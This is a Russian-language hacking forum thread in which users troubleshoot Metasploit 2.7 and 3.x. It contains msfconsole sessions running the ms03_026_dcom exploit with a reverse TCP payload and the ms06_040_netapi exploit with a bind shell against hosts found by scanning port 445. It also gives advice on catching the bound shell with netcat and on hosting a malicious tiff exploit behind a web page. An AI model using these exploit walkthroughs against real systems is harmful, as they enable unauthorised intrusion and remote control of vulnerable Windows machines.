Нет, стоит стандартный просмоторщик. Просто странно, что у всех wmf загружает, а у меня tiff. Может просто win32_reverse глючный? Вот чё у меня выходит: Screen
Всё правильно, загружается tiff файл, (можно изменить расширение на любое графиских форматов jpg, bmp, wmf - файл-картинка с начинкой и сплоитом так же будет работать). Скорее всего сплоит не срабатывает, так как у тебя установлен Qicktime и картинки обрабатываются уже не системной dll (хотя и открытие происходит в просмотрщике факсов) поэтому сплоит и не срабатывает...
Теперь ясно, спасибо. Теперь, если можно, общий вопросик: 1) Как подобрать шелл-код (PAYLOAD) под эксплойт? 2) Допусти скачал я код эксплойта и PAYLOAD'a, как теперь скомпилировать его под pm формат? pm - это почти Перл, т.е интерпретируемый формат, он не компилируется... Начинки можно генерировать в Web-интерфейсе. И вообще пора юзать версию 3.0 (там решён 1 вопрос) и сплоиты на Руби. -=lebed=-
Открыть исходный код, например Оперой (самому зайти по вредоносной ссылке), сохранить как html, взять из кэша браузера сплоит (tiff-файл) и рядом сохранить, отредактировать в html путь к файлу со сплоитом. Во второй части всё есть, читай тут:https://forum.antichat.ru/showthread.php?t=21686
слушайте скачал мету 3.0 а где там загрузочный файл я там не могу найти как запустить в 2.7 там прям в файле а здесь нету помогите скачал с офф сайта...
Такой вот вопрос, в версии 2.7 нет команды "ls ------------- List the current directory (Показать файлы в текущей директории)" как тогда просматривать текущую деректорию? Набери help в консоли - должна быть ls и в 2.7 -=lebed=-
Выложите плиз мануал по установке metasploit 3 на FREEBSD, скачал и незнаю как его собрать. В портах к сожелению устаревшая версия 2.7 Тут http://framework.metasploit.com/msf/support - маны по установке посмотри -=lebed=- Там смотрел, нема.
блин чет не выходит ! нашел уязвимость на 135 порту нашел експлоит msf > use windows/dcerpc/ms03_026_dcom msf exploit(ms03_026_dcom) > set PAYLOAD windows/exec/reverse_tcp PAYLOAD => windows/exec/reverse_tcp msf exploit(ms03_026_dcom) > set RHOST 192.168.191.105 RHOST => 192.168.191.105 msf exploit(ms03_026_dcom) > set LHOST 192.168.191.172 LHOST => 192.168.191.172 msf exploit(ms03_026_dcom) > show options Module options: Name Current Setting Required Description ---- --------------- -------- ----------- RHOST 192.168.191.105 yes The target address RPORT 135 yes The target port Payload options: Name Current Setting Required Description ---- --------------- -------- ----------- CMD yes The command string to execute EXITFUNC thread yes Exit technique: seh, thread, process LHOST 192.168.191.172 yes The local address LPORT 4444 yes The local port Exploit target: Id Name -- ---- 0 Windows NT SP3-6a/2000/XP/2003 Universal msf exploit(ms03_026_dcom) > exploit [-] Exploit failed: The following options failed to validate: CMD. вроди везде да а в итоге СМД нифига! че мне там еще прописывать!??????
На сайте http://metasploit.com/ доступна версия 3.1, она запускается из-под Ruby http://rubyforge.org/ У кого-то работает? У меня не запускается, Ruby установлен, но опыта работы с ним нету.
У меня всё работает! там также как в 3.0 есть работа через веб даже скины можно поменять и через консоль заходиш в Metasploit 3 GUI там во вкладке Window Console(Crtl+O);
незнаю у лебедя вроди нет, но если знаешь где есть поделись адреском буду благодарен! и где можно нарыть какие нибудь инструкции про другие начинки не только к этому сплойту
Вижу назрела необходимость "разжевать" версию 3.1... как руки дойдут, постараюсь, а может это уже сдеалает кто-то другой? ЗЫ смд - это параметр начинки шелла, т.е комманда которая должна выполниться при захвате управления...
https://forum.antichat.ru/thread32452.html https://forum.antichat.ru/thread38434.html https://forum.antichat.ru/thread21686.html Вот в этих статьях описанны почти все начинки Ну далеко не все и скорее типы начинок чем они сами... прим. -=lebed=-
сканирую сеть на 445 порту весит эта уязвимость причем у каждого второго ms06-040, запускаю сплойт привинчиваю (generic/shell_bind_tcp) ну ввожу LHOST i RHOST запускаю и получаю: msf exploit(ms06_040_netapi) > exploit [*] Started bind handler [*] Detected a Windows XP SP0/SP1 target [*] Binding to 4b324fc8-1670-01d3-1278-5a47bf6ee188:3.0@ncacn_np:192.168.191.81[\BROWSER] ... [*] Bound to 4b324fc8-1670-01d3-1278-5a47bf6ee188:3.0@ncacn_np:192.168.191.81[\BROWSER] ... [*] Building the stub data... [*] Calling the vulnerable function... че мне теперь делать не могу понять Ответ: У тебя начинка shell_bind_tcp - биндит порт на удалённой машине, теперь логично пробовать к нему подключаться неткатом... (nc host port)